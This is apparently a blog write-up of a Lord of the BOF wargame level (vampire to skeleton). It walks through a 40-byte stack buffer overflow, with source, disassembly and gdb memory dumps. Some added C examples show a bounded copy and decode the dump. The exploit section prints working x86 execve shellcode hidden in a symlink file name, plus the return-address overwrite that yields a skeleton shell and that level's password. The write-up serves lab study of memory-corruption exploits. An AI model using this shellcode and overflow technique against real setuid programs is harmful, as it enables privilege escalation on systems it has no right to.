[lob] vampire -> skeleton

2022. 9. 13. 12:13·Wargame/Hackerchool

1. intro

2. Code and analysis

2.1 C code

/*
        The Lord of the BOF : The Fellowship of the BOF
        - skeleton
        - argv hunter
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

extern char **environ;

int main(int argc, char *argv[])
{
	char buffer[40];
	int i, saved_argc;

	if(argc < 2){
		printf("argv error\n");
		exit(0);
	}

	// egghunter: zero every environment string
	for(i=0; environ[i]; i++)
		memset(environ[i], 0, strlen(environ[i]));

	if(argv[1][47] != '\xbf')
	{
		printf("stack is still your friend.\n");
		exit(0);
	}

	// check the length of argument
	if(strlen(argv[1]) > 48){
		printf("argument is too long!\n");
		exit(0);
	}

	// argc saver
	saved_argc = argc;

	strcpy(buffer, argv[1]);	// up to 48 bytes into a 40-byte buffer
	printf("%s\n", buffer);

	// buffer hunter
	memset(buffer, 0, 40);

	// ultra argv hunter!
	for(i=0; i<saved_argc; i++)
		memset(argv[i], 0, strlen(argv[i]));
}
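
As an added example that is not part of the LOB source above, the following C shows the copy bounded by the destination size that the program's strcpy lacks: the original rejects only arguments longer than 48 bytes, while buffer is 40 bytes, so the 8 bytes that an accepted 48-byte argument writes past the buffer are exactly the saved frame pointer and the return address (which is why argv[1][47] is the last byte of the return address). The function names copy_arg_checked and try_copy and the constructed all-'A' inputs are this example's own.

```c
/* Added example (not part of the LOB skeleton source): a copy bounded by the
 * destination size, which is what the original strcpy(buffer, argv[1]) lacks.
 * The original only rejects arguments longer than 48 bytes while buffer is 40
 * bytes, so an accepted 48-byte argument writes 8 bytes past the buffer.
 * The names copy_arg_checked and try_copy and the all-'A' inputs are this
 * example's own. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUFFER_SIZE 40   /* same size as buffer[40] in skeleton.c */

/* Copy src into dst (dstlen bytes) together with the terminating NUL.
 * Returns 0 on success and -1 if src does not fit, in which case nothing
 * is written. */
int copy_arg_checked(char *dst, size_t dstlen, const char *src)
{
    size_t len = strlen(src);

    if (dstlen == 0 || len > dstlen - 1)   /* len bytes plus one for the NUL */
        return -1;
    memcpy(dst, src, len + 1);
    return 0;
}

/* Build a constructed argument of arglen 'A' bytes and try to copy it into a
 * BUFFER_SIZE buffer. Returns copy_arg_checked's result (0 accepted, -1
 * rejected, -2 allocation failure), so a caller can see exactly where the
 * bound lies: 0..39 bytes fit, 40 and more do not. */
int try_copy(size_t arglen)
{
    char buffer[BUFFER_SIZE];
    char *arg = malloc(arglen + 1);
    int rc;

    if (arg == NULL)
        return -2;
    memset(arg, 'A', arglen);
    arg[arglen] = '\0';
    rc = copy_arg_checked(buffer, sizeof buffer, arg);
    free(arg);
    return rc;
}

/* The argument handling of skeleton.c with the copy bounded correctly. */
int main(int argc, char *argv[])
{
    char buffer[BUFFER_SIZE];

    if (argc < 2) {
        printf("argv error\n");
        return 1;
    }
    /* The bound comes from sizeof buffer, not from a constant (48) that was
     * never compared against the buffer size. */
    if (copy_arg_checked(buffer, sizeof buffer, argv[1]) != 0) {
        printf("argument is too long!\n");
        return 1;
    }
    printf("%s\n", buffer);
    return 0;
}
```

try_copy(39) returns 0 and try_copy(40) and try_copy(48) return -1, which is the boundary the original check at 48 misses by 8 bytes.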

2.3. Analysis

2.3.1. Assembler code (key part)

It is the same as the previous level; the added part, shown below, is the loop that zeroes every argv entry.

0x8048623 <main+291>:	mov    0xffffffd4(%ebp),%eax
0x8048626 <main+294>:	cmp    0xffffffd0(%ebp),%eax
0x8048629 <main+297>:	jl     0x8048630 <main+304>
0x804862b <main+299>:	jmp    0x8048670 <main+368>
0x804862d <main+301>:	lea    0x0(%esi),%esi
0x8048630 <main+304>:	mov    0xffffffd4(%ebp),%eax
0x8048633 <main+307>:	lea    0x0(,%eax,4),%edx
0x804863a <main+314>:	mov    0xc(%ebp),%eax
0x804863d <main+317>:	mov    (%eax,%edx,1),%edx
0x8048640 <main+320>:	push   %edx
0x8048641 <main+321>:	call   0x80483f0 <strlen>
0x8048646 <main+326>:	add    $0x4,%esp
0x8048649 <main+329>:	mov    %eax,%eax
0x804864b <main+331>:	push   %eax
0x804864c <main+332>:	push   $0x0
0x804864e <main+334>:	mov    0xffffffd4(%ebp),%eax
0x8048651 <main+337>:	lea    0x0(,%eax,4),%edx
0x8048658 <main+344>:	mov    0xc(%ebp),%eax
0x804865b <main+347>:	mov    (%eax,%edx,1),%edx
0x804865e <main+350>:	push   %edx
0x804865f <main+351>:	call   0x8048430 <memset>
0x8048664 <main+356>:	add    $0xc,%esp
0x8048667 <main+359>:	incl   0xffffffd4(%ebp)
0x804866a <main+362>:	jmp    0x8048623 <main+291>
0x804866c <main+364>:	lea    0x0(%esi,1),%esi

3. Vulnerability check and attack preparation

3.1 Vulnerability

The vulnerability is the same as before.

3.2 Attack preparation

Since both the environment-variable area and the stack are zeroed, it looks as if there is nowhere left to write a value,

but going to the very end of the stack, some value is still there.

0xbfffffb8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffffc8:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffffd8:	0x00000000	0x00000000	0x00000000	0x6f682f00
0xbfffffe8:	0x762f656d	0x69706d61	0x732f6572	0x656c656b
0xbffffff8:	0x00616f74	0x00000000	Cannot access memory at address 0xc0000000

Printing it shows that it is the file name: the kernel copies the executable's path to the top of the stack at exec time as a string separate from argv[0], so the argv hunter loop never touches it.
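
As an added example that is not from the original post, the following C decodes the little-endian words of a gdb x/Nx dump back into bytes and pulls out the longest printable run, which is how the dump above is read as a path. The dump text is copied from the post (the lines from 0xbfffffb8 on, without gdb's trailing error line); the function names and the isprint-based extraction are this example's own.

```c
/* Added example (not from the original post): decode the little-endian words of
 * a gdb "x/Nx" dump back into bytes and pull out the longest printable run,
 * which is how the dump above is read as a path. The dump text is copied from
 * the post; the function names and the isprint-based extraction are this
 * example's own. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The last lines of the post's x/40x dump, without gdb's trailing error line. */
static const char *const kDump =
    "0xbfffffb8:\t0x00000000\t0x00000000\t0x00000000\t0x00000000\n"
    "0xbfffffc8:\t0x00000000\t0x00000000\t0x00000000\t0x00000000\n"
    "0xbfffffd8:\t0x00000000\t0x00000000\t0x00000000\t0x6f682f00\n"
    "0xbfffffe8:\t0x762f656d\t0x69706d61\t0x732f6572\t0x656c656b\n"
    "0xbffffff8:\t0x00616f74\t0x00000000\n";

/* Parse lines of the form "ADDR:\tWORD\tWORD..." and append each word's bytes
 * in little-endian order (least significant byte first, as x86 stores them)
 * to out. A token that does not start with "0x" ends the line. Returns the
 * number of bytes written. */
size_t decode_dump(const char *dump, unsigned char *out, size_t outlen)
{
    size_t n = 0;
    const char *p = dump;

    while (*p != '\0') {
        const char *eol = strchr(p, '\n');
        const char *end = eol ? eol : p + strlen(p);
        const char *colon = memchr(p, ':', (size_t)(end - p));
        const char *q = colon ? colon + 1 : end;

        while (q < end) {
            char *next;
            unsigned long word;
            int b;

            while (q < end && isspace((unsigned char)*q))
                q++;
            if (end - q < 2 || q[0] != '0' || (q[1] != 'x' && q[1] != 'X'))
                break;                      /* e.g. "Cannot access memory" */
            word = strtoul(q, &next, 16);
            if (next == q)
                break;
            for (b = 0; b < 4 && n < outlen; b++)
                out[n++] = (unsigned char)((word >> (8 * b)) & 0xff);
            q = next;
        }
        p = eol ? eol + 1 : end;
    }
    return n;
}

/* Copy the longest run of printable bytes in buf into str (capacity cap,
 * NUL-terminated). Returns the run length. */
size_t longest_string(const unsigned char *buf, size_t n, char *str, size_t cap)
{
    size_t best_start = 0, best_len = 0, i = 0;
    size_t copy;

    while (i < n) {
        size_t start = i;
        while (i < n && isprint(buf[i]))
            i++;
        if (i - start > best_len) {
            best_len = i - start;
            best_start = start;
        }
        if (i == start)
            i++;                            /* skip the non-printable byte */
    }
    copy = (best_len < cap - 1) ? best_len : cap - 1;
    memcpy(str, buf + best_start, copy);
    str[copy] = '\0';
    return best_len;
}

/* Decode the constructed dump and return the path it contains. */
const char *filename_from_dump(void)
{
    static unsigned char bytes[128];
    static char name[128];
    size_t n = decode_dump(kDump, bytes, sizeof bytes);

    longest_string(bytes, n, name, sizeof name);
    return name;
}

int main(void)
{
    printf("%s\n", filename_from_dump());   /* /home/vampire/skeletoa */
    return 0;
}
```

Reading the words byte by byte from the least significant end is the step that turns 0x6f682f00 0x762f656d ... into "/home/vampire/skeletoa"; the same routine applies to the second dump, where the path continues into the run of 0x41 bytes.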

Then let us check whether a file name changed through a symbolic link is placed there.

[vampire@localhost vampire]$ ln -s skeletoa `python -c 'print "A"*100'`
[vampire@localhost vampire]$ ls
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  skeleton
skeletoa                                                                                              skeleton.c
[vampire@localhost vampire]$ gdb AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
(gdb) b *main+368
(gdb) r `python -c 'print "A"*44 + "\xbf\xbf\xbf\xbf"'`
Starting program: /home/vampire/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA `python -c 'print "A"*44 + "\xbf\xbf\xbf\xbf"'`
/bin/bash2: /home/troll/.bashrc: Permission denied
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿
Breakpoint 1, 0x8048670 in main ()
(gdb) x/40x 0xbfffff00
0xbfffff00:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff10:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff20:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff30:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff40:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff50:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff60:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff70:	0x00000000	0x00000000	0x00000000	0x00000000
0xbfffff80:	0x00000000	0x00000000	0x6f682f00	0x762f656d
0xbfffff90:	0x69706d61	0x412f6572	0x41414141	0x41414141
(gdb) 
0xbfffffa0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbfffffb0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbfffffc0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbfffffd0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbfffffe0:	0x41414141	0x41414141	0x41414141	0x41414141
0xbffffff0:	0x41414141	0x41414141	0x00414141	0x00000000
0xc0000000:	Cannot access memory at address 0xc0000000

4. exploit

Based on the above, the attack that uses the file name as the shellcode goes as follows.

[vampire@localhost vampire]$ ln -s skeletoa `python -c 'print "A"*100 + "\x31\xc0\x50\xb8\x2e\x2e\x73\x68\x66\x05\x01\x01\x50\xb8\x2e\x62\x69\x6e\x04\x01\x50\x89\xe3\x31\xc0\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"'`
[vampire@localhost vampire]$ ls   
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1󿿐¸..shf???P¸.bin??P?ᲀP?ᑿᮿ˿
skeletoa
skeleton
skeleton.c
[vampire@localhost vampire]$ ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1󿿐¸..shf^E^A^AP¸.bin^D^APᲀPᓉᯞK̀ `python -c 'print "A"*44 + "\xa0\xff\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ÿÿ¿
bash$ id
uid=509(vampire) gid=509(vampire) groups=509(vampire)
bash$ my-pass
euid = 509
music world
bash$ exit
exit
[vampire@localhost vampire]$ rm AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1󿿐¸..shf^E^A^AP¸.bin^D^APᲀPᓉᯞK̀ 
[vampire@localhost vampire]$ ln -s skeleton `python -c 'print "A"*100 + "\x31\xc0\x50\xb8\x2e\x2e\x73\x68\x66\x05\x01\x01\x50\xb8\x2e\x62\x69\x6e\x04\x01\x50\x89\xe3\x31\xc0\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"'`
[vampire@localhost vampire]$ ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA1󿿐¸..shf^E^A^AP¸.bin^D^APᲀPᓉᯞK̀ `python -c 'print "A"*44 + "\xa0\xff\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ÿÿ¿
bash$ id
uid=509(vampire) gid=509(vampire) euid=510(skeleton) egid=510(skeleton) groups=509(vampire)
bash$ my-pass
euid = 510
shellcoder
Attribution-NonCommercial-NoDerivatives (CC BY-NC-ND)
wyv3rn